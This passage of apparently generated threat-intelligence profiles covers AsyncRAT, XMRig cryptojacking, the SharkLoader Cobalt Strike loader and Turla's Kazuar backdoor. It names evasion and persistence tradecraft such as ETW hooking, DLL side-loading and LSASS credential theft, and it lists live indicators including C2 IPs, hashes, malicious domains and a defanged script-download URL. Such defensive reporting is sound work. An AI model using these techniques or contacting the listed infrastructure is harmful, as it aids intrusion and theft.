The content explicitly links it to StealC affiliate activity, Amadey botnet clusters, and SocGholish/FakeUpdates infections. Proofpoint and IBM X-Force observed StealC-linked activity delivering AsyncRAT alongside Amadey, RedLine Stealer, Vidar, XTinyLoader, XMRig, SectopRAT, HijackLoader, SmokeLoader, zgRAT, and in some cases LockBit Black ransomware. ESET reporting cited here notes AsyncRAT among payloads distributed in the Amadey ecosystem. Orange Cyberdefense reporting cited in the content states SocGholish infections delivered loaders such as GhoLoader and MintsLoader that led to GhostWeaver, LockBit, RansomHub, AsyncRAT, and NetSupport RAT. MITRE ATT&CK content included here also notes AsyncRAT among malware obtained by threat actors during Operation Spalax. Targeting in the provided material is broad and largely opportunistic, consistent with commodity RAT usage. The content references phishing, fake updates, gaming-themed lures, AI-themed lure documents, and malware delivery through compromised websites. Geographic reporting cited here notes that in 2025 AsyncRAT was among the top malware families in Mexico by unique victims. No single threat actor is uniquely associated with AsyncRAT in the provided content; instead it is used across multiple criminal delivery ecosystems. High-confidence indicators and artifacts directly mentioned in the content include the C2 IP 144.126.151.185:2005 from one analyzed infection chain; the IP 107.172.10.190 from an AI-lure campaign branch delivering AsyncRAT; and a public sandboxed sample masquerading as a gaming-related file named "Escape From Tarkovnls..scr" with SHA1 3065DA0D35988807C34C98164D35385F846AB1DF and SHA256 84C8AD42D82A82951A1968C738FC813A83FC5CD6F1C2F446F2960CF21A373E14. The content also references inbound and outbound traffic to infrastructure associated with AsyncRAT and repeated use of Windows-native scripting and LOLBins during delivery.
XMRig is an open-source cryptocurrency miner, most commonly used to mine Monero (XMR), that is frequently repurposed and maliciously modified for cryptojacking campaigns on both Windows and Linux systems. The content shows XMRig being deployed as a primary payload or follow-on payload by multiple malware families and intrusion chains, including Orchard, Blue Mockingbird, Blitz, Outlaw/Dota, Prometei, Cliptomaner, MrbMiner, Librarian Ghouls, StealC-linked activity, DanaBot supply-chain activity, and opportunistic post-exploitation following exploitation of public-facing applications. Observed delivery vectors and installation methods include phishing and paste-and-run lures, compromised NPM packages, SQL Server compromise, brute-force attacks against MS SQL or SSH, malware loaders and downloaders, trojanized software and game cheats, and exploitation of vulnerabilities such as React2Shell and SAP CVE-2025-31324-related activity. Across the referenced incidents, XMRig commonly runs as a Monero miner connecting to mining pools over ports such as 3333, and is often disguised as legitimate or system-related binaries such as conhost.exe, svchost.exe, csrss.exe, kswapd0, or Windows Update Service.exe. Several cases explicitly describe maliciously modified XMRig builds, including versions 6.15.2, 6.19.0, and 6.22.1, with 6.19.0 also embedded in Linux campaigns. Modifications and surrounding tradecraft include process hollowing, watchdog processes, persistence via Windows services, scheduled tasks, Run keys, WMI permanent event subscriptions, COR_PROFILER abuse, SSH authorized_keys replacement, cron persistence, and use of kernel drivers such as WinRing0x64.sys to improve mining performance. Some campaigns also relay XMRig JSON-RPC traffic through command-and-control infrastructure; Orchard, for example, used DGA-generated domains plus ojena.duckdns.org to control XMRig and forwarded unencrypted XMRig JSON-RPC traffic identifying XMRig/6.15.2.
The malware is associated with broad victimology rather than a single sector. The content places XMRig on enterprise servers, terminal servers, SQL servers, Linux hosts, cloud systems, industrial control system environments, and user workstations. It appears in financially motivated cryptojacking, mixed monetization chains that also include ransomware or credential theft, and commodity malware ecosystems where loaders or stealers deliver secondary payloads. Notable indicators directly mentioned in the content include ojena.duckdns.org, hxxp[://]23.95.123[.]5:666/xmrigCCall/8bq.sh, and mining-pool communications over port 3333. High-confidence file and path examples include C:\ProgramData\Microsoft\Crypto\conhost.exe, /var/tmp/.xlamb, and Linux miner filenames such as kswapd0. Overall, the content consistently characterizes XMRig as legitimate mining software that is widely abused or modified by threat actors for unauthorized resource hijacking and persistence.
SharkLoader is a previously undocumented malware loader identified by Kaspersky in the broader StrikeShark intrusion campaign. Its primary role is to deploy Cobalt Strike Beacon on compromised Windows systems. Researchers first identified it while investigating activity targeting a diplomatic organization in Indonesia, and related activity was observed against government, diplomatic, software development, and other organizations in Indonesia, Taiwan, Hong Kong, Lebanon, Syria, Colombia, North Macedonia, Nepal, and Serbia. Observed delivery included exploitation of internet-facing applications and custom droppers masquerading as legitimate software such as Cisco AnyConnect and Google Update. Reported exploited products and vulnerabilities associated with the broader campaign included Microsoft Exchange (including CVE-2021-26855 and CVE-2022-41082), Openfire (CVE-2023-32315), GeoServer (CVE-2024-36401), Apache Shiro (CVE-2016-4437), Hikvision (CVE-2021-36260), Microsoft SharePoint (CVE-2021-27076), Zimbra (CVE-2022-27925), F5 BIG-IP (CVE-2023-46747), Fortinet FortiOS (CVE-2022-40684 and CVE-2024-21762), React Server Components (CVE-2025-55182), and Cisco IOS XE Web UI (CVE-2023-20198). Some droppers also displayed decoy PDF documents while silently installing the malware. Technically, SharkLoader abuses DLL side-loading, commonly via the legitimate Windows binary SystemSettings.exe loading a malicious SystemSettings.dll. Variants also used alternative sideloading targets including msedge.dll, PrintDialog.dll, and miracastview.dll. The malware uses the Perfect DLL Hijacking technique, decrypts staged components such as DscCoreR.mui and SyncRes.dat/SyncRest.dat, and loads Cobalt Strike Beacon in memory. Reported cryptographic details include Blowfish decryption of DscCoreR.mui and AES-128 decryption of SyncRes.dat. 
SharkLoader also installs API hooks using Microsoft Detours and MinHook, including hooks on VirtualAlloc and Sleep to reduce memory-scanning visibility, and suppresses ETW logging by hooking EtwEventWrite, EventWriteEx, and EventWrite. SharkLoader itself does not contain built-in persistence in all observed cases, but the associated intrusion activity used web shells, Registry Run keys, and scheduled tasks to relaunch the sideloading chain. Observed task and persistence artifacts included scheduled tasks executing SystemSettings.exe, a Run key named MFUpdate, and a scheduled task named \Microsoft\Windows\Edge\Edgeupdate. Post-compromise activity included reconnaissance, Active Directory enumeration, credential theft from LSASS and the NTDS database, and use of tools such as FScan, Searchall, Pillager, SharpGPOAbuse, Procdump64, ntdsutil, Cobalt Strike, and web shells. Attribution remains unconfirmed. Kaspersky reported no direct code or infrastructure overlap with known threat groups, but assessed with low confidence that the operators may be Chinese-speaking based on use of open-source post-compromise tools associated with Chinese-speaking developers. Reported indicators of compromise associated with the campaign included domains connect-microsoft.com, ms-record.com, ms-record.top, and ms-tray.top, and hashes including C559CC68986933200FD5D9E4388E2F58, B3352B42432DEDC4A519F011DC8B5D5A, 24FCEBDEECBA65004FDB0923763D74FD, 9C872A0D5D5A38950E8B9AC9B488BE3F, AA3086BE652C8B20B0B29B2730D57119, A514D1BB62D7916475946FE7C07AC0AA, and 9CBD560F820C95D7C38342CD558CB5C6.
Kazuar is a Turla backdoor and espionage implant, described in the content as Turla’s flagship backdoor and a long-running malware framework active since at least 2015 and used since at least 2017. It is associated with the Russia-linked threat actor Turla, also referred to in the content as Secret Blizzard and Venomous Bear, and has been used in cyberespionage operations including against military and defense targets in Ukraine and in compromises of government organizations. The content also describes operational collaboration in which Gamaredon tooling, including PteroGraphin and PteroOdd, was used to deploy Kazuar on compromised Ukrainian targets and in at least one case restore Turla’s access. Capabilities directly mentioned in the content include installing itself as a new Windows service for persistence, gathering information on users, obtaining a list of running processes through WMI querying, capturing images from the webcam, launching JavaScript on the device, stealing data from event logs, collecting information about system files, and stealing authentication tokens, cookies, and credentials from a wide variety of programs including browsers, FTP clients, VPN software, KeePass, Azure, AWS, and Outlook. Kazuar stages command output and collected data in files before exfiltration. It communicates with command-and-control servers over HTTP and HTTPS, encodes communications in Base64, and can also act as a webserver listening for inbound HTTP requests through an exposed API. The content further notes that Kazuar has used compromised WordPress blogs as command-and-control servers. The content also describes newer Kazuar evolution into a modular espionage framework with Kernel, Bridge, and Worker modules. 
In that reporting, the Kernel coordinates tasks, configuration updates, and anti-analysis checks; the Bridge proxies external communications; and Worker modules perform keystroke capture, screenshot capture, file harvesting, window monitoring, and email collection. Reported communication paths include HTTP, WebSockets, and Exchange Web Services, with internal routing via hidden Windows messaging, named pipes, Mailslots, and Google Protocol Buffers. Some Kazuar payloads are described as cryptographically tied to a victim hostname, and delivery methods mentioned include the Pelmeni dropper and a .NET COM-object loader that decrypts and executes payloads in memory. Observed infrastructure and indicators mentioned in the content include compromised WordPress sites used for C2 and the following Kazuar-related domains and URLs from one reported victim network: bombheros[.]com, simplifiedhomesales[.]com, mtsoft.hol[.]es, polishpod101[.]com, echange-afrique-insa[.]fr, afci-newsoft[.]fr, antoniosalieri[.]es, and aviatnetworks[.]com. The content also lists in-the-wild filenames including dbgsview.exe, DebugView.exe, adflctlmon.exe, PSExtendPrivacy.exe, and Agent.exe; .NET module version IDs 7c1a417d-961e-4fbd-9df7-7b99994eaec7, 2cde886e-ee24-496a-bb31-1ced6b766ced, 76b7b11a-4124-448b-9903-15524e321f3f, and d3429016-d029-45b8-b260-85221265838e; and SHA256 samples 69908f05b436bd97baae56296bf9b9e734486516f9bb9938c2b8752e152315d4, c1f278f88275e07cc03bd390fe1cbeedd55933110c6fd16de4187f4c4aaf42b9, 6eb31006ca318a21eb619d008226f08e287f753aec9042269203290462eaa00d, and 436cfce71290c2fc2f2c362541db68ced6847c66a73b55487e5e5c73b0636c85.